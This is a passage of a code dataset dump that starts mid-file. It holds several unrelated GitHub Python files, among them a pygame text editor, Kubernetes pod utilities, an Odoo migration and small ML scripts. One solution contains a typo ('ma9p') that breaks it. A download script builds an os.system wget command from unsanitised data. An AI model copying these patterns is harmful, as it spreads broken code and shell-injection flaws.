pygame.transform.scale(surface, (width, height))\n\n # 4. Put the text.\n putPos = (pt[0] - 0.5*width, pt[1] - 0.5*height)\n screen.blit(surface, putPos)\n self.textSz = (0.5*width, 0.5*height)\n\n # Draw a fine border.\n pygame.draw.rect(screen, bdrColour, \\\n pygame.Rect(putPos, (width+8, height)), 1)\n else:\n self.textSz = None\n\n def drawFinding(self, screen):\n '''Draws this block when the cursors resting on it but it hasn't yet\n been entered.'''\n if self.textSz == None:\n return\n\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n halfWidth, halfHeight = self.textSz\n x0,y0 = pl.parentPoint(self.pt, scArea)\n x1,y1 = (x0-halfWidth, y0-halfHeight)\n x2,y2 = (x0+halfWidth+8, y0-halfHeight)\n x3,y3 = (x0+halfWidth+8, y0+halfHeight)\n x4,y4 = (x0-halfWidth, y0+halfHeight)\n polygon = [(x1,y1),(x2,y2),(x3,y3),(x4,y4)]\n\n borderColour, fillColour, thickness = RectType.Selected\n\n if fillColour:\n pygame.draw.polygon(screen, fillColour, polygon)\n if borderColour:\n pygame.draw.polygon(screen, borderColour, polygon, thickness)\n\n def drawSelected(self, screen):\n if self.textSz == None:\n return\n\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n x0, y0 = pl.parentPoint(self.pt, scArea)\n\n # Choose the appropriate line.\n if self.selLength == 0 == self.selLines:\n n, m = self.cursorPos\n else:\n n, m = self.selStart\n lineSize = self.font.get_linesize()\n y = lineSize * n\n\n # Get the sizes of the different sections.\n sa = self.font.size(self.lines[n][:m])[0]\n\n # Draw a cursor line.\n if (n-1) in self.wrappedLines:\n x = sa + self.followWidth\n else:\n x = sa\n\n if self.sFactor < 1.:\n x = x * self.sFactor\n y = y * self.sFactor\n lineSize = lineSize * self.sFactor\n\n pt0 = (x0 -self.textSz[0] + x, y0 - self.textSz[1] + y)\n\n if self.selLength == 0 == self.selLines:\n # No selection. Just draw cursor.\n pt1 = (x0 - self.textSz[0] + x, y0 - self.textSz[1] + y + lineSize)\n pygame.draw.line(screen, csrColour, pt0, pt1)\n elif self.selLines == 0:\n # Create a surface of the selected text.\n m2 = m + self.selLength\n s = self.font.render(self.lines[n][m:m2], False, \\\n tuple(255-i for i in csrColour), csrColour)\n s.set_colorkey(None)\n\n if self.sFactor < 1.:\n width, height = s.get_size()\n width = int(round(width * self.sFactor))\n height = int(round(height * self.sFactor))\n s = pygame.transform.scale(s, (width, height))\n screen.blit(s, pt0)\n else:\n # Multiline selection.\n\n # Create a surface of this line of the selected text.\n if m < len(self.lines[n]):\n text = self.lines[n][m:]\n if len(text) > 0:\n s = self.font.render(text, False, \\\n tuple(255-i for i in csrColour), csrColour)\n s.set_colorkey(None)\n\n if self.sFactor < 1.:\n width, height = s.get_size()\n width = int(round(width * self.sFactor))\n height = int(round(height * self.sFactor))\n s = pygame.transform.scale(s, (width, height))\n screen.blit(s, pt0)\n\n # Central section.\n for i in range(n + 1, n + self.selLines):\n if (i-1) in self.wrappedLines:\n x = x0 - self.textSz[0] + self.followWidth\n else:\n x = x0 - self.textSz[0]\n pt0 = (x, pt0[1] + lineSize)\n\n if self.lines[i] == '':\n # Single vertical bar.\n pygame.draw.line(screen, csrColour, pt0, \\\n (pt0[0], pt0[1]+lineSize))\n else:\n s = self.font.render(self.lines[i], False, \\\n tuple(255-i for i in csrColour), csrColour)\n s.set_colorkey(None)\n if self.sFactor < 1.:\n width, height = s.get_size()\n width = int(round(width * self.sFactor))\n height = int(round(height * self.sFactor))\n s = pygame.transform.scale(s, (width, height))\n screen.blit(s, pt0)\n\n # Last line.\n i = n + self.selLines\n if (i-1) in self.wrappedLines:\n x = x0 - self.textSz[0] + self.followWidth\n else:\n x = x0 - self.textSz[0]\n pt0 = (x, pt0[1] + lineSize)\n text = self.lines[i][:self.selLength]\n if text != '':\n s = self.font.render(text,\\\n False, tuple(255-i for i in csrColour), csrColour)\n s.set_colorkey(None)\n\n if self.sFactor < 1.:\n width, height = s.get_size()\n width = int(round(width * self.sFactor))\n height = int(round(height * self.sFactor))\n s = pygame.transform.scale(s, (width, height))\n screen.blit(s, pt0)\n\n def checkMouseHover(self, pos):\n # Check for text not showing.\n if self.textSz == None:\n return False\n\n # Now check for hover over text.\n mPt = self.block.g_absPlacement.parentPoint(pos, self.scArea)\n tPt = self.block.g_absPlacement.parentPoint(self.pt, self.scArea)\n\n # 8-pixel padding on each side where you can still click.\n if tPt[0] - self.textSz[0] - 8 < mPt[0] < tPt[0] + self.textSz[0] + 8:\n if tPt[1] - self.textSz[1] < mPt[1] < tPt[1] + self.textSz[1]:\n self.hoverPos = mPt\n return True\n return False\n\n def mouseHover(self, screen):\n # Do nothing special on a hover.\n pass\n\n def mouseClick(self, actor):\n # Make sure that this text's selected.\n actor.txtClick(self)\n\n # Set the cursor position.\n self.highlightMotion = False\n self.moveCursor(self.getClickPoint(self.hoverPos))\n\n def mouseDrag(self, event):\n self.highlightMotion = True\n self.moveCursor(self.getClickPoint(event.pos))\n\n def getClickPoint(self, point):\n '''internal. Returns the coordinates of the specified screen position.\n '''\n\n pl = self.block.g_absPlacement\n x0, y0 = pl.parentPoint(self.pt, self.scArea)\n\n # First find the correct row for the cursor.\n x = point[0] - x0 + self.textSz[0]\n y = point[1] - y0 + self.textSz[1]\n\n lineSize = self.font.get_linesize()\n if self.sFactor < 1.:\n lineSize = lineSize * self.sFactor\n x = x / self.sFactor\n\n n = max(0, min(int(y // lineSize), len(self.lines) - 1))\n\n return [n, self.getClickPointInternal(x, n)]\n\n def getClickPointInternal(self, x, n):\n '''internal. Returns the x-coordinates taken from the specified offset\n from the left side of this block after scaling. n is the line\n number.'''\n\n # Now find the correct column.\n if n-1 in self.wrappedLines:\n s0 = self.followWidth\n else:\n s0 = 0\n s = self.font.size(self.lines[n])[0]\n\n # 1. Guess the position.\n if x <= s0:\n m = 0\n elif x >= s0 + s:\n m = len(self.lines[n])\n else:\n m = int(round(len(self.lines[n]) * (x-s0) / s))\n\n # 2. Refine the guess.\n gDist = self.font.size(self.lines[n][:m])[0] + s0\n\n if gDist < x:\n # We guessed too low.\n while gDist < x:\n diff = x - gDist\n m = m + 1\n gDist = self.font.size(self.lines[n][:m])[0] + s0\n\n # We found the turning point.\n if diff < gDist - x:\n m = m - 1\n elif gDist > x:\n # We guessed too high.\n while gDist > x:\n diff = gDist - x\n m = m - 1\n gDist = self.font.size(self.lines[n][:m])[0] + s0\n\n # Found the turning point.\n if diff < x - gDist:\n m = m + 1\n\n # 3. Return the value.\n return m\n\n def moveCursor(self, pt):\n 'internal. Moves the cursor to a new point.'\n newY, newX = pt\n if not self.highlightMotion:\n self.cursorPos = [newY, newX]\n self.selLength = 0\n self.selLines = 0\n else:\n if not (self.selLength or self.selLines):\n selEnd = self.cursorPos\n elif self.selStart == self.cursorPos:\n selEnd = self.selEnd()\n else:\n selEnd = self.selStart\n\n if newY < selEnd[0] or (newY == selEnd[0] and newX < selEnd[1]):\n self.selLines = selEnd[0] - newY\n if self.selLines == 0:\n self.selLength = selEnd[1] - newX\n else:\n self.selLength = selEnd[1]\n self.selStart = [newY, newX]\n else:\n self.selLines = newY - selEnd[0]\n self.selStart = selEnd\n if self.selLines == 0:\n self.selLength = newX - selEnd[1]\n else:\n self.selLength = newX\n\n self.cursorPos = [newY, newX]\n\n def blankBetween(self, start, end):\n '''internal. Blanks between the two specified positions, which are\n positions in the displayed text.'''\n pos1 = self.actualPos(start)\n pos2 = self.actualPos(end)\n\n if pos1[0] == pos2[0]:\n # All on the same (actual) line.\n x = self.values[pos1[0]]\n self.values[pos1[0]] = x[:pos1[1]] + x[pos2[1]:]\n else:\n # Split across multiple lines.\n for i in range(pos2[0] - pos1[0]-1):\n self.values.pop(pos1[0]+1)\n self.values[pos1[0]] = self.values[pos1[0]][:pos1[1]] + \\\n self.values.pop(pos1[0]+1)[pos2[1]:]\n\n def selEnd(self):\n '''internal. Returns the position of the end of the selection in the\n displayed text.'''\n if not (self.selLength or self.selLines):\n return self.selStart\n if self.selLines:\n return [self.selStart[0] + self.selLines,\n self.selLength]\n else:\n return [self.selStart[0], self.selStart[1] + \\\n self.selLength]\n\n def blankSelection(self):\n 'internal. Blanks the selection. Returns True if there was one.'\n if not (self.selLength or self.selLines):\n return False\n savedPos = self.actualPos(self.selStart)\n self.blankBetween(self.selStart, self.selEnd())\n\n self.selLength = 0\n self.selLines = 0\n self.cursorPos = self.screenPos(savedPos)\n\n self.wordWrap()\n return True\n\n def keyUp(self, event, actor):\n 'internal. A key has been released.'\n if self.keyEvent and event.key == self.keyEvent.key:\n self.keyEvent = None\n\n def keyPress(self, event, actor):\n 'internal. A key has been pressed.'\n self.keyEvent = event\n self.actor = actor\n self.processKeystroke(event)\n self.repeatTime = time.time() + repeatLag\n\n def processKeystroke(self, event):\n 'internal. Process a keystroke.'\n\n char = keyboard.charPressed(event.key, event.mod)\n if isinstance(char, str):\n # Translates to a char.\n self.blankSelection()\n n, m = self.actualPos(self.cursorPos)\n self.values[n] = self.values[n][:m] + char + \\\n self.values[n][m:]\n self.wordWrap()\n self.cursorPos = self.screenPos([n, m + 1])\n else:\n key, mod = char\n self.highlightMotion = mod & pgl.KMOD_SHIFT\n mod = mod & ~ pgl.KMOD_SHIFT\n n,m = self.cursorPos\n\n if mod == 0:\n if key == keyboard.Return:\n # Enter.\n self.blankSelection()\n n, m = self.actualPos(self.cursorPos)\n\n # Split the line at this point.\n self.values.insert(n + 1, self.values[n][m:])\n self.values[n] = self.values[n][:m]\n self.wordWrap()\n self.cursorPos = self.screenPos([n + 1, 0])\n elif key == keyboard.Left:\n # Left arrow.\n if m == 0:\n if n != 0:\n self.moveCursor([n-1, len(self.lines[n-1])])\n else:\n self.moveCursor([n, m - 1])\n elif key == keyboard.Right:\n # Right arrow.\n if m < len(self.lines[n]):\n self.moveCursor([n, m + 1])\n elif n < len(self.lines) - 1:\n self.moveCursor([n+1, 0])\n elif key == keyboard.Up:\n # Up arrow.\n if n == 0:\n return\n xPos = self.font.size(self.lines[n][:m])[0]\n if (n-1) in self.wrappedLines:\n xPos = xPos + self.followWidth\n n = n - 1\n m = self.getClickPointInternal(xPos, n)\n self.moveCursor([n, m])\n elif key == keyboard.Down:\n # Down arrow.\n if n == len(self.lines) - 1:\n return\n xPos = self.font.size(self.lines[n][:m])[0]\n if (n-1) in self.wrappedLines:\n xPos = xPos + self.followWidth\n n = n + 1\n m = self.getClickPointInternal(xPos, n)\n self.moveCursor([n, m])\n elif key == keyboard.Home:\n # Home key.\n self.moveCursor([n, 0])\n elif key == keyboard.End:\n # End key.\n self.moveCursor([n, len(self.lines[n])])\n elif key == keyboard.Backspace:\n # Backspace.\n if not self.blankSelection():\n n,m = self.actualPos(self.cursorPos)\n if m > 0:\n self.values[n] = self.values[n][:m-1] + self.values[n][m:]\n m = m - 1\n else:\n # Combine this line with the previous.\n if n > 0:\n m = len(self.values[n-1])\n self.values[n-1] = self.values[n-1] + \\\n self.values.pop(n)\n n = n-1\n else:\n return\n self.wordWrap()\n self.cursorPos = self.screenPos([n, m])\n elif key == keyboard.Delete:\n # Delete.\n if not self.blankSelection():\n n,m = self.actualPos(self.cursorPos)\n if m < len(self.values[n]):\n self.values[n] = self.values[n][:m] + \\\n self.values[n][m+1:]\n else:\n # Combine line with next.\n if n < len(self.values) - 1:\n self.values[n] = self.values[n] + \\\n self.values.pop(n+1)\n else:\n return\n self.wordWrap()\n self.cursorPos = self.screenPos([n, m])\n else:\n return\n elif mod == pgl.KMOD_LCTRL:\n if key == keyboard.Left:\n # Move left one word.\n n1, m1 = n, m\n wordStarted = False\n while True:\n if m1 == 0:\n if n1 == 0:\n break\n if wordStarted:\n break\n n1 = n1 - 1\n m1 = len(self.lines[n1]) - 1\n else:\n m1 = m1 - 1\n if self.lines[n1][m1] == ' ':\n if wordStarted:\n break\n else:\n wordStarted = True\n\n n, m = n1, m1\n self.moveCursor([n, m])\n elif key == keyboard.Right:\n # Move right one word.\n n1, m1 = n, m\n if m == len(self.lines[n]):\n m = m - 1\n wordStarted = False\n while True:\n if m1 >= len(self.lines[n1]) - 1:\n if n1 == len(self.lines) - 1:\n break\n if wordStarted:\n break\n n1 = n1 + 1\n m1 = 0\n else:\n m1 = m1 + 1\n if self.lines[n1][m1] == ' ':\n if wordStarted:\n break\n else:\n wordStarted = True\n n, m = n1, m1\n self.moveCursor([n, m + 1])\n elif key == keyboard.Home:\n # Move to the top of the feature.\n self.moveCursor([0, 0])\n elif key == keyboard.End:\n # Move to the end of the feature.\n self.moveCursor([len(self.lines)-1,\n len(self.lines[-1])])\n else:\n return\n else:\n return\n\n self.block.master.g_treeModified = True\n\n def setValues(self, values):\n self.values = values\n self.wordWrap()\n\n n, m = self.cursorPos\n if n > len(self.lines):\n n = len(self.lines)\n if m > len(self.lines[n]):\n m = 0\n self.cursorPos = [n, m]\n\n def save(self):\n 'Calls the notify function about the changes.'\n if isinstance(self.callback, tuple):\n fn, args = self.callback\n fn(self.values, *args)\n else:\n self.callback(self.values)\n\n self.block.master.g_treeModified = True\n\n n,m = self.cursorPos\n if m > len(self.lines[n]):\n self.cursorPos[1] = 0\n\n self.keyEvent = None\n\n def beginEdit(self):\n 'Called when this element\\'s first entered.'\n # Select the whole first line of text.\n self.cursorPos = [0, 0]\n self.selStart = [0, 0]\n self.selLines = len(self.lines) - 1\n self.selLength = len(self.lines[-1])\n\nfrom . import sourceFile\nfrom .actor import SysMode\n\nif __name__ == '__main__':\n from . import main\n mb = main.main()\n","repo_name":"Poikilos/flowchartpython","sub_path":"flowchartpython/painter.py","file_name":"painter.py","file_ext":"py","file_size_in_byte":96161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13497968474","text":"import logging\nimport select\nimport tarfile\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom tempfile import TemporaryFile\nfrom time import sleep\nfrom typing import List\n\nimport kubernetes as k8s\nfrom websocket import ABNF\n\nfrom gefyra.configuration import OperatorConfiguration\n\nlogger = logging.getLogger(\"gefyra.utils\")\n\n\nclass WSFileManager:\n \"\"\"\n WS wrapper to manage read and write bytes in K8s WSClient\n \"\"\"\n\n def __init__(self, ws_client):\n \"\"\"\n\n :param wsclient: Kubernetes WSClient\n \"\"\"\n self.ws_client = ws_client\n\n def read_bytes(self, timeout=0):\n \"\"\"\n Read slice of bytes from stream\n\n :param timeout: read timeout\n :return: stdout, stderr and closed stream flag\n \"\"\"\n stdout_bytes = None\n stderr_bytes = None\n\n if self.ws_client.is_open():\n if not self.ws_client.sock.connected:\n self.ws_client._connected = False\n else:\n r, _, _ = select.select((self.ws_client.sock.sock,), (), (), timeout)\n if r:\n op_code, frame = self.ws_client.sock.recv_data_frame(True)\n if op_code == ABNF.OPCODE_CLOSE:\n self.ws_client._connected = False\n elif op_code == ABNF.OPCODE_BINARY or op_code == ABNF.OPCODE_TEXT:\n data = frame.data\n if len(data) > 1:\n channel = data[0]\n data = data[1:]\n if data:\n if channel == k8s.stream.ws_client.STDOUT_CHANNEL:\n stdout_bytes = data\n elif channel == k8s.stream.ws_client.STDERR_CHANNEL:\n stderr_bytes = data\n return stdout_bytes, stderr_bytes, not self.ws_client._connected\n\n\ndef stream_copy_from_pod(pod_name, namespace, source_path, destination_path):\n # https://stackoverflow.com/questions/59703610/copy-file-from-pod-to-host-by-using-kubernetes-python-client\n\n \"\"\"\n Copy file from pod to the host.\n\n :param pod_name: String. Pod name\n :param namespace: String. Namespace\n :param source_path: String. Pod destination file path\n :param destination_path: Host destination file path\n :return: bool\n \"\"\"\n\n core_v1_api = k8s.client.CoreV1Api()\n\n command_copy = [\"tar\", \"cf\", \"-\", source_path]\n with TemporaryFile() as tar_buffer:\n exec_stream = k8s.stream.stream(\n core_v1_api.connect_get_namespaced_pod_exec,\n pod_name,\n namespace,\n command=command_copy,\n stderr=True,\n stdin=True,\n stdout=True,\n tty=False,\n _preload_content=False,\n )\n # Copy file to stream\n try:\n reader = WSFileManager(exec_stream)\n while True:\n out, err, closed = reader.read_bytes()\n if out:\n tar_buffer.write(out)\n elif err:\n logger.debug(\n \"Error copying file {0}\".format(err.decode(\"utf-8\", \"replace\"))\n )\n if closed:\n break\n exec_stream.close()\n tar_buffer.flush()\n tar_buffer.seek(0)\n with tarfile.open(fileobj=tar_buffer, mode=\"r:\") as tar:\n member = tar.getmember(source_path.split(\"/\", 1)[1])\n tar.makefile(member, destination_path)\n return True\n except Exception as e:\n logger.info(e)\n raise e\n\n\ndef read_wireguard_config(raw: str) -> dict:\n \"\"\"\n :param raw: the wireguard config string; similar to TOML but does not comply with\n :return: a parsed dict of the configuration\n \"\"\"\n data = defaultdict(dict)\n _prefix = \"none\"\n for line in raw.split(\"\\n\"):\n try:\n if line.strip() == \"\":\n continue\n elif \"[Interface]\" in line:\n _prefix = \"Interface\"\n continue\n elif \"[Peer]\" in line:\n _prefix = \"Peer\"\n continue\n key, value = line.split(\"=\", 1)\n data[f\"{_prefix}.{key.strip()}\"] = value.strip()\n except Exception as e:\n logger.exception(e)\n return data\n\n\ndef notify_stowaway_pod(\n core_v1_api: k8s.client.CoreV1Api,\n pod_name: str,\n configuration: OperatorConfiguration,\n) -> None:\n \"\"\"\n Notify the Stowaway Pod; causes it to instantly reload mounted configmaps\n :param core_v1_api:\n :param pod_name:\n :param configuration:\n :return:\n \"\"\"\n logger.info(f\"Notify {pod_name}\")\n try:\n core_v1_api.patch_namespaced_pod(\n name=pod_name,\n body={\n \"metadata\": {\n \"annotations\": {\n \"operator\": f\"update-notification-\"\n f\"{datetime.now().strftime('%Y%m%d%H%M%S')}\"\n }\n }\n },\n namespace=configuration.NAMESPACE,\n )\n except k8s.client.exceptions.ApiException as e:\n logger.exception(e)\n sleep(1)\n\n\ndef exec_command_pod(\n api_instance: k8s.client.CoreV1Api,\n pod_name: str,\n namespace: str,\n container_name: str,\n command: List[str],\n run_async: bool = False,\n) -> str:\n \"\"\"\n Exec a command on a Pod and exit\n :param api_instance: a CoreV1Api instance\n :param pod_name: the name of the Pod to exec this command on\n :param namespace: the namespace this Pod is running in\n :param container_name: the container name of this Pod\n :param command: command as List[str]\n :param run_async: run this command async\n :return: the result output as str\n \"\"\"\n if run_async:\n resp = api_instance.connect_get_namespaced_pod_exec(\n pod_name,\n namespace,\n container=container_name,\n command=command,\n stderr=False,\n stdin=False,\n stdout=False,\n tty=False,\n async_req=True,\n )\n else:\n resp = k8s.stream.stream(\n api_instance.connect_get_namespaced_pod_exec,\n pod_name,\n namespace,\n container=container_name,\n command=command,\n stderr=True,\n stdin=False,\n stdout=True,\n tty=False,\n )\n if not run_async:\n logger.debug(\"Response: \" + resp)\n return resp\n\n\ndef get_deployment_of_pod(\n api_instance: k8s.client.AppsV1Api, pod_name: str, namespace: str\n) -> k8s.client.V1Deployment:\n \"\"\"\n Return a Deployment of a Pod by its name\n :param api_instance: instance of k8s.client.AppsV1Api\n :param pod_name: name of the Pod\n :return: k8s.client.V1Deployment of the Pod\n \"\"\"\n deployment_name = pod_name.rsplit(\"-\", 2)[0]\n return api_instance.read_namespaced_deployment(deployment_name, namespace=namespace)\n\n\ndef get_all_probes(container: k8s.client.V1Container) -> List[k8s.client.V1Probe]:\n probes = []\n if container.startup_probe:\n probes.append(container.startup_probe)\n if container.readiness_probe:\n probes.append(container.readiness_probe)\n if container.liveness_probe:\n probes.append(container.liveness_probe)\n return probes\n\n\ndef check_probe_compatibility(probe: k8s.client.V1Probe) -> bool:\n \"\"\"\n Check if this type of probe is compatible with Gefyra Carrier\n :param probe: instance of k8s.client.V1Probe\n :return: bool if this is compatible\n \"\"\"\n if probe is None:\n return True\n elif probe._exec:\n # exec is not supported\n return False\n elif probe.tcp_socket:\n # tcp sockets are not yet supported\n return False\n elif probe.http_get:\n return True\n else:\n return True\n","repo_name":"ar4s-dev/gefyra","sub_path":"operator/gefyra/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"41108728257","text":"from PIL import Image\nimport matplotlib.pyplot as plt\n\nimport torchvision.transforms as transforms\nimport torch\nimport numpy as np\nfrom ConvDenoiser import ConvDenoiser\n\n\ndef show_img(source, new):\n source = source[0].detach().numpy()\n source = np.transpose(source, (1, 2, 0))\n new = new[0].detach().numpy()\n new = np.transpose(new, (1, 2, 0))\n\n fig, axes = plt.subplots(nrows=1, ncols=2, sharex=True,\n sharey=True, figsize=(25, 4))\n axes[0].imshow(source)\n axes[1].imshow(new)\n plt.show()\n\n\nif __name__ == '__main__':\n print(\"denoise a single image\")\n\n img_path = \"test.png\"\n model_path = \"trained_model.pt\"\n\n image = Image.open(img_path).convert('RGB')\n in_transform = transforms.Compose([\n transforms.Resize(ConvDenoiser.INPUT_SIZE),\n transforms.ToTensor()\n ])\n\n image = in_transform(image)\n image = image.unsqueeze(0)\n\n model = ConvDenoiser()\n model.load_state_dict(torch.load(model_path))\n\n is_cuda = torch.cuda.is_available()\n\n model.eval()\n output = model(image)\n\n show_img(image, output)\n","repo_name":"FabienDanieau/pytorch_autoencoder","sub_path":"denoise.py","file_name":"denoise.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19471718724","text":"import os\nimport json\nimport requests\n\nerrors = []\nwith open(\"output.json\", \"rb\") as f:\n content = f.read()\n json_data = json.loads(content)\n for video_id in json_data:\n video_url = \"https://s3-us-west-1.amazonaws.com/workout-generator-exercises/originals/\" + video_id + \".mp4\"\n os.system('wget ' + video_url)\n","repo_name":"slobdell/light-api","sub_path":"light_api/scripts/download_originals.py","file_name":"download_originals.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"34202486817","text":"from PyQt5.QtWidgets import QWidget, QMainWindow\nfrom ..command import Command\nfrom .interpolation import bilinear_interpolation, nearest_neighbor_interpolation\nfrom pycture.dialogs import ScaleDialog\nfrom pycture.editor import Editor\n\n\nclass Scale(Command):\n def __init__(self, parent: QWidget):\n super().__init__(parent, \"Scale\")\n self.interpolation_techniques = {\n \"Nearest neighbour\": nearest_neighbor_interpolation,\n \"Bilinear\": bilinear_interpolation,\n }\n\n def execute(self, main_window: QMainWindow):\n self.main_window = main_window\n dialog = ScaleDialog(main_window, main_window.get_editor_list(), list(self.interpolation_techniques.keys()))\n dialog.set_editor(main_window.get_active_editor_name())\n dialog.set_interpolation_technique(\n list(self.interpolation_techniques.keys())[0])\n\n dialog.applied.connect(self.apply_scale)\n\n def apply_scale(self, \n editor_title: str, interpolation_name: str, new_size: (int, int)\n ):\n editor = self.main_window.get_editor(editor_title)\n image = editor.get_image()\n title = editor.windowTitle()\n \n interpolation_technique = self.interpolation_techniques[interpolation_name]\n scaled_image = image.scale(new_size, interpolation_technique)\n self.main_window.add_editor(editor=Editor(\n self.main_window, scaled_image, title + ' scaled'))\n","repo_name":"miguel-martinr/Pycture","sub_path":"src/pycture/commands/edit_commands/scale.py","file_name":"scale.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32594539320","text":"import json\nimport logging\n\nfrom odoo import SUPERUSER_ID, api\n\n_logger = logging.getLogger(\"shopfloor.\" + __name__)\n\n\ndef _compute_logs_new_values(env):\n log_entries = env[\"shopfloor.log\"].search([])\n for entry in log_entries:\n new_vals = {}\n for fname in (\"params\", \"headers\", \"result\"):\n if not entry[fname]:\n continue\n # make it json-like\n replace_map = [\n (\"{'\", '{\"'),\n (\"'}\", '\"}'),\n (\"':\", '\":'),\n (\": '\", ': \"'),\n (\"',\", '\",'),\n (\", '\", ', \"'),\n (\"False\", \"false\"),\n (\"True\", \"true\"),\n (\"None\", \"null\"),\n (\"\\\\xa0\", \" \"),\n ]\n json_val = entry[fname]\n for to_replace, replace_with in replace_map:\n json_val = json_val.replace(to_replace, replace_with)\n try:\n val = json.loads(json_val)\n except Exception:\n # fail gracefully and do not break the whole thing\n # just for not being able to convert a value.\n # We don't use these values as json yet, no harm.\n _logger.warning(\n \"`%s` JSON convert failed for record %d\", (fname, entry.id)\n )\n else:\n new_vals[fname] = json.dumps(val, indent=4, sort_keys=True)\n if entry.error and not entry.exception_name:\n exception_details = _get_exception_details(entry)\n if exception_details:\n new_vals.update(exception_details)\n entry.write(new_vals)\n\n\ndef _get_exception_details(entry):\n for line in reversed(entry.error.splitlines()):\n if \"Error:\" in line:\n name, msg = line.split(\":\", 1)\n return {\n \"exception_name\": name.strip(),\n \"exception_message\": msg.strip(\"() \"),\n }\n\n\ndef migrate(cr, version):\n env = api.Environment(cr, SUPERUSER_ID, {})\n _compute_logs_new_values(env)\n","repo_name":"nguyenductamlhp/servermns","sub_path":"addons/wms/shopfloor/migrations/13.0.1.2.0/post-migration.py","file_name":"post-migration.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13299648141","text":"from typing import List\n\n\nclass Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n toReturn = \"\"\n # Get shortest word\n shortestWord = min(strs, key=len)\n\n # Return word if array has one item\n if len(strs) == 1:\n return strs[0]\n\n # Go through the letters of the shortest word\n for i in range(len(shortestWord)):\n \n # If all words in strs start with sub-array 0:i+1 from shortest word, update to return and go next\n if all(list(ma9p( lambda x: x.startswith(shortestWord[0:i+1]), strs))):\n toReturn = shortestWord[0:i+1]\n # Else, break and return what we have\n else:\n break\n\n return toReturn\n\n\nsol = Solution()\nprint(sol.longestCommonPrefix([\"flower\",\"flow\",\"flight\"]))","repo_name":"AbuZaitoun/LeetCode","sub_path":"longestCommonPrefix.py","file_name":"longestCommonPrefix.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35196533367","text":"from __future__ import absolute_import\n\nfrom datetime import datetime\n\nfrom celery import shared_task\nimport whois as whois_lib\nimport json\nfrom checker.models import Domain\nimport decimal\nfrom django.db.models.base import ModelState\n\nclass DateTimeEncoder(json.JSONEncoder):\n def default(self, obj):\n if hasattr(obj, 'isoformat'):\n return obj.isoformat()\n elif isinstance(obj, decimal.Decimal):\n return float(obj)\n elif isinstance(obj, ModelState):\n return None\n else:\n return json.JSONEncoder.default(self, obj)\n\n@shared_task\ndef whois(id):\n domain = Domain.objects.get(id=id)\n\n result = None\n try:\n result = whois_lib.whois(domain.name)\n except:\n pass\n\n if not result:\n domain.status = 'check-failed'\n\n if result:\n domain.response = json.dumps(result.__dict__, cls=DateTimeEncoder)\n if result.expiration_date: domain.expiration_date = result.expiration_date[-1]\n domain.registrar = result.registrar\n if result.creation_date: domain.creation_date = result.creation_date[-1]\n if result.updated_date: domain.last_updated = result.updated_date[-1]\n\n if domain.expiration_date:\n if domain.expiration_date < datetime.now():\n domain.status = 'expired'\n else:\n domain.status = 'good'\n else:\n domain.status = 'check-failed'\n\n domain.last_checked = datetime.now()\n domain.save()\n","repo_name":"deanrock/domain-expiry-checker","sub_path":"checker/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16818146620","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nclass StateNet(nn.Module):\n def __init__(self):\n super().__init__()\n self.network = nn.Sequential(\n \n nn.Conv2d(3, 6, kernel_size = 5, padding = 0),\n nn.BatchNorm2d(6),\n nn.ReLU(),\n nn.AvgPool2d(2,2),\n nn.Conv2d(6,16, kernel_size = 5, padding = 0),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.AvgPool2d(2,2),\n nn.Conv2d(16,120, kernel_size = 5, padding = 0),\n nn.BatchNorm2d(120),\n nn.ReLU(),\n nn.AvgPool2d(2,2),\n\n \n nn.Flatten(),\n nn.Linear(69120,84), #da modificare\n nn.Dropout(p=0.5),\n nn.ReLU(),\n nn.Linear(84, 6),\n #nn.Softmax(dim=1),\n ) \n \n def forward(self, xb):\n out = self.network(xb)\n #print('size tensore out layer: ', out.shape) \n return out","repo_name":"BananaCloud-CC2022-Parthenope/BananaCloud","sub_path":"OpenFaaS_function/banana-cloud/core/models/statenet.py","file_name":"statenet.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"25908748930","text":"from turtle import *\n\nbgcolor('black')\ncolor('cyan')\nspeed(20)\nright(45)\n\nfor i in range(155):\n circle(30)\n if 7 0.5):\n print(new_sentence, '는 {:.2f} % 확률로 존댓말입니다.'.format(score * 100))\n else:\n print(new_sentence, '는 {:.2f} % 확률로 반말입니다.'.format((1 - score) * 100))\n\n# =============================================================\ndo_predict('이렇게 말했나요?')\ndo_predict('이렇게 말하지요')\ndo_predict('이렇게 말해보세요')\ndo_predict('이렇게 말한 거에요')\ndo_predict('이렇게 말하지 마시오')\ndo_predict('이렇게 말하죠')\ndo_predict('이렇게 말했죠')\n\n# =============================================================\n# 정리 중\n# https://docs.google.com/spreadsheets/d/17OxKDrjJH6KJs_J-Ng0AsvaZXp6svhGdKIjEbLP0Xhw/edit#gid=0\n\n'''\n\n한글만 남기기: 이렇게 말했나요 \n토큰화: ['이렇', '게', '말하', '었', '나요']\n불용어 제거: ['이렇', '게', '말하', '었', '나요']\n정수 인코딩: 